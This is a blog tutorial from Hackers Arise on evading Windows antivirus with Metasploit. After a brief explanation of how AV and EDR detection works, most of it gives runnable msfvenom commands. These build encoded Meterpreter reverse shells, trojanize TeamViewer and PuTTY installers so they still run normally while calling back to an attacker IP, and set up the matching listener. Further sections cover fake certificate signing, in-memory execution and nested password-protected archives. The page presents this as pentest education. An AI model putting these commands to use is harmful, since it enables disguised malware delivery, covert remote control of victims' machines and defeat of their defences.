Welcome back, my aspiring cyberwarriors! In this series, we are looking at using the wold’s most popular hacking framework, Metasploit. As Metasploit has become more popular, the major anti-virus developers have found ways to detect and remove metasploit based payloads making it increasingly difficult to successfully exploit these systems with Metasploit. In this tutorial, I […]
The post Metasploit Basics for Hackers: Evading Windows Anti-Virus (AV) first appeared on Hackers Arise.
Welcome back, my aspiring cyberwarriors!
In this series, we are looking at using the wold’s most popular hacking framework, Metasploit. As Metasploit has become more popular, the major anti-virus developers have found ways to detect and remove metasploit based payloads making it increasingly difficult to successfully exploit these systems with Metasploit.
In this tutorial, I want to show you a few of the ways you evade AV while using Metasploit making your hack/pentest more efficient and successful.
How Does Antivirus or EDR Work?
Before creating a loader or trying to bypass security, it is important to understand how antivirus (AV) and EDR (Endpoint Detection and Response) software decides if a program is malicious.
1. Signature-Based Detection
Every file can be processed through a hash function, like SHA-256, to create a unique signature (also called a fingerprint). Antivirus software keeps a database of signatures that belong to known malicious files.
When a new file is scanned, the antivirus checks if its signature is in that list. If it matches, the file is flagged or blocked. If it doesn’t, it might be allowed.
This method is fast, but not foolproof. Changing even a single byte in a file will result in a completely different hash. That means attackers can easily modify malware to avoid detection by this method.
Also, this technique does not help against new threats whose signatures are not yet known.
Example: If Mimikatz has a known SHA-256 hash, and you download a file with that same hash, most antivirus products will block it right away.
2. Static Analysis
Static analysis means scanning the contents of a file without running it. Antivirus tools look for suspicious patterns, such as specific strings of text or code that are commonly used in malware.
For example, if a file contains the word “mimikatz”, some antivirus tools will mark it as suspicious or dangerous.
There are tools like DefenderCheck that let you see which strings in a file are being flagged by Windows Defender.
YARA rules are also used in static analysis. These rules define patterns to look for in files. For example, a YARA rule might look for a specific comment in the code like:
// *** Benjamin DELPY `gentilkiwi` ( [email protected] )
If that pattern is found, the file could be flagged as a version of Mimikatz. If the pattern is not present, the file is not flagged.
So static analysis is effective at detecting known threats by looking for familiar code or keywords, even if the file has never been seen before.
3. Heuristic and Behavioral Analysis
This method focuses on what a program tries to do, instead of what it looks like. The idea is to detect suspicious or harmful behavior.
Often, antivirus software runs the program inside a sandbox. A sandbox is a safe, isolated environment where the file can be executed without harming the actual system.
While the file runs, the antivirus observes its actions. If the program starts doing things that are commonly associated with malware — like accessing sensitive files, creating processes, or injecting code into other programs — it may be flagged as dangerous.
This approach is useful for catching new or modified malware that avoids detection through signature or static analysis.
4. Network detection
Finally, some security solutions may monitor the connections made by the machine and block a threat based on certain indicators.
For example, a block might be decided if a program initiates a connection to an IP address known to be associated with malicious servers. This strengthens security by preventing malicious software from communicating with dangerous servers.
Evasion Techniques
Most modern antivirus tools, especially host-based ones, rely heavily on signature-based detection. This means they scan files and processes using a database of known “signatures” — unique patterns that identify parts of malicious code. When antivirus software finds a match, it usually acts right away by quarantining the file and stopping it from running.
So how do we avoid this kind of detection? One of the first steps is to blend in. Simply encoding payloads with different formats or running them through multiple rounds of obfuscation isn’t enough anymore. Antivirus engines have become smarter, and many of them recognize these techniques, especially when used alone.
On top of that, just opening a communication channel between an attacker and a victim system can trigger alerts from IDS/IPS systems (Intrusion Detection/Prevention Systems). These tools monitor network traffic and can flag or block suspicious connections.
1. Encrypted Communication with Meterpreter
With Metasploit Framework 6 (MSF6), attackers have a more powerful option. Using msfconsole, you can now create AES-encrypted tunnels that route Meterpreter traffic back to the attacker’s system. This encryption protects the communication from being detected by network-based IDS/IPS tools, since the contents of the traffic are hidden.
Still, some networks use strict firewall rules that may block outgoing traffic based on source IPs or protocols. In these cases, attackers often look for services that are already allowed through the firewall. A famous example is the Equifax hack of 2017, where attackers used a vulnerability in Apache Struts to gain access to sensitive servers. They then used DNS exfiltration — a stealthy method of sending data out through DNS requests — to move stolen data without detection for months.
2. Payloads and File-Based Detection
Even if encrypted traffic gets through, there’s another big problem: file-based antivirus detection. Before a payload is executed and loaded into memory, it has to exist as a file — even briefly. That file can be scanned, fingerprinted, and blocked if it matches anything in the antivirus signature database.
AV companies are also constantly monitoring tools like Metasploit. Many of the default payloads created by tools like msfvenom are already known and blocked by most antivirus programs. That means using these payloads as-is often results in instant detection.
3. Advanced Payload Encoders (x64)
When trying to bypass static analysis and detection mechanisms, using an encoder can add a valuable layer of obfuscation to your payload. Below are a few notable x64 encoders available in msfvenom, each using a unique technique to hinder reverse engineering or signature-based detection.
1. x64/xor_context
This encoder applies context-aware XOR encryption, dynamically modifying the XOR key during execution. This behavior makes the payload more resistant to traditional static analysis tools that rely on pattern matching or signature recognition.
Command Example:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -e x64/xor_context -o payload.exe
2. x64/xor_dynamic
With xor_dynamic, the XOR key isn’t just pre-defined—it’s generated on the fly during runtime. This dynamic behavior makes it significantly harder for static detection engines to pinpoint a reliable signature, offering stronger evasion than static XOR methods.
Command Example:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -e x64/xor_dynamic -o payload.exe
3. x64/zutto_dekiru
The zutto_dekiru encoder takes obfuscation a step further. It employs advanced techniques including encryption and structural transformations of the payload. This makes reverse engineering significantly more time-consuming, and provides strong defense against both static and dynamic analysis.
Command Example:
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -e x64/zutto_dekiru -o payload.exe
4. Using Executable Templates with msfvenom
Thankfully, msfvenom provides a helpful feature: executable templates. Instead of creating a completely new and suspicious-looking file, you can take a legitimate executable — like an installer or utility — and embed your payload inside it. This creates what’s called a backdoored executable.
The shellcode is hidden inside a real, working program, making it harder for static analysis tools to flag it. By combining different encoding methods, shellcode formats, and real-world programs, you increase the chance of slipping past antivirus checks.
Here’s what this approach gives you:
- The outer file looks legitimate (like a normal installer or app)
- The malicious code is embedded inside, encrypted or obfuscated
- Antivirus has a harder time detecting it during basic scans
Below is an example of how msfvenom can be used to embed a payload into a legitimate executable:
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.15.148 LPORT=8080 -k -x TeamViewerx32.exe -e x86/shikata_ga_nai -a x86 –platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 70
In this command:
-p specifies the payload
-x is the template executable you want to use
-f exe sets the output format
-o sets the name of the new file
-i is the number of iterations to further evade detection
-e is the encoder used for payload obfuscation
The result is an executable that still runs as expected, but also delivers your payload when launched.
As you can see, the Defender can’t find malware in it.
For the most part, when a target launches a backdoored executable, nothing will appear to happen, which can raise suspicions in some cases. To improve our chances, we need to trigger the continuation of the normal execution of the launched application while pulling the payload in a separate thread from the main application. We do so with the -k flag as it appears above. However, even with the -k flag running, the target will only notice the running backdoor if they launch the backdoored executable template from a CLI environment. If they do so, a separate window will pop up with the payload, which will not close until we finish running the payload session interaction on the target.
In this example, we’ll use PuTTY, a commonly used SSH client for Windows. By embedding our payload into PuTTY, we increase our chances of bypassing antivirus tools, since the file looks and behaves like a normal application.
Step 1: Download PuTTY
First, download the PuTTY executable. On Linux, you can use the following wget command:
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
This fetches the 32-bit version of PuTTY.
Step 2: Inject the Payload with msfvenom
Next, we use msfvenom to inject a Meterpreter reverse shell into the PuTTY executable:
msfvenom -a x86 –platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=10.10.15.148 lport=443 -e x86/shikata_ga_nai -i 43 -b “\x00” -f exe -o puttyX.exe
Let’s break down what this command does:
-a x86 sets the architecture to 32-bit (to match the original PuTTY binary)
–platform windows specifies the target operating system
-k ensures the original PuTTY functionality is preserved after payload injection
-b “\x00” avoids null bytes in the payload (which could break execution)
The result is a modified PuTTY executable (puttyX.exe) that still runs normally but also opens a backdoor when launched.
Step 3: Set Up the Listener in Metasploit
Since this is a reverse shell, the payload will try to connect back to the attacking machine. We need to set up a listener using Metasploit’s exploit handler.
Open Metasploit and run the following commands:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.15.148
set LPORT 443
exploit
Once the handler is running, it will wait for a connection. As soon as the target runs puttyX.exe, a Meterpreter session will open, giving you control over the system.
Evasion Tools
While custom payload encoding is one method of bypassing security mechanisms, there are also publicly available tools that attempt to do the heavy lifting for you. Below are a couple of examples worth exploring for demonstration and learning purposes.
1. ScareCrow
ScareCrow used to be a solid tool for payload delivery and evasion, but it’s seen better days. Currently, it’s difficult to use all of its features effectively. According to its GitHub issues, much of the instability seems to stem from outdated SSL implementations. The project hasn’t been updated in years, which limits its viability for serious use. That said, it’s still useful for demo purposes or basic evasion scenarios.
To get started, you’ll need to have the Go programming language installed and compile ScareCrow manually.
Basic usage flow:
First, generate a payload using msfvenom.
Then, sign the resulting executable with a fake Microsoft certificate using ScareCrow.
Run it on a target system and, if everything lines up, you’ll see a connection back to your listener.
Despite its limitations today, ScareCrow can still help you understand how signature spoofing and certificate abuse work in evasion.
2. PyInMemoryPE
PyInMemoryPE is a Python-based tool that executes PE files directly in memory—avoiding disk write operations and potentially flying under the radar of some antivirus engines. It’s been compiled to run on Windows, and it still works against a few AVs, though keep in mind: once a tool becomes publicly available, it gets dissected, signatures get created, and detection rates rise quickly.
Workflow:
First generate your payload
Download PyInMemoryPE for Windows.
Set up a simple python3 -m http.server to serve the executable.
From the Windows target, access the payload via cmd to execute it in memory.
And get the connection back
Obfuscating Payloads with Archives and Packers
When it comes to evading antivirus detection, one of the simplest and most effective tricks in the book is compression with encryption. Archiving payloads into password-protected .zip or .rar files can slip past many AV solutions. While most modern scanners will flag these as “unscannable” rather than outright malicious, they won’t raise high-severity alerts. It’s up to the admin to investigate manually—and many won’t bother unless something else trips a wire.
Step 1: Generate the Payload
We’ll start with a standard msfvenom Meterpreter reverse shell payload, encoded five times with shikata_ga_nai to increase obfuscation.
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.15.148 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 –platform windows -o ~/test.js -i 5
Once generated, you’ll get the classic shellcode. Next you need to obfuscate it further.
Step 3: Double Archive Obfuscation
Now, we’ll archive the payload twice, adding a password and removing file extensions at each stage to confuse both AV and casual inspection.
Install RAR Utility
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
First Archive (Password-Protected)
rar a test.rar -p test.js
You’ll be prompted to enter a password (use a secure one; even something like infected123 works for testing). Then, rename the archive to remove the extension:
mv test.rar test
Second Archive (Nested)
rar a test2.rar -p test
mv test2.rar test2
Now we have test2, a doubly-archived, password-protected payload with no visible file extension. AVs generally choke on this unless they unpack both levels and guess the file type.
Step 4: Scan the Obfuscated Archive
Zero detections!
This technique is an effective way to move payloads in and out of target systems (e.g., C2 channels or exfiltration pipelines), but it’s also a double-edged sword. Many blue teams monitor for encrypted or unscannable archives, especially if extensions are stripped. Use with caution.
A Note on Packers
Packers serve a similar function but operate at the binary level. They wrap an executable in a decompression stub, which extracts and executes the original payload in memory. This not only compresses the binary but also makes static analysis significantly harder.
Popular packers include:
- UPX
- MPRESS
- The Enigma Protector
- Themida
- ExeStealth
- Morphine
You can use these tools to add an extra layer of obfuscation to your .exe payloads either pre- or post-encoding with msfvenom.
For a deep dive into how AVs deal with packed executables, check out the PolyPack Project. It explores how different packing methods affect detection across various engines.
Final Thoughts
The field of Windows evasion is deep, constantly evolving, and highly reactive. What works today might get flagged tomorrow. Microsoft and major AV vendors are actively monitoring, updating, and patching against new techniques on a regular basis.
If you’re serious about improving your ability to bypass defenses, consider diving into C#. Many modern red team tools and custom loaders are written in it, offering more control over how your payloads behave and evade. Learning how to develop with C# can open the door to more advanced tactics, from manual PE injection to API unhooking and beyond.
Evasion isn’t a one-size-fits-all game—it’s a cat-and-mouse match where creativity and adaptability are key.
The post Metasploit Basics for Hackers: Evading Windows Anti-Virus (AV) first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/metasploit-basics-for-hackers-evading-windows-anti-virus-av/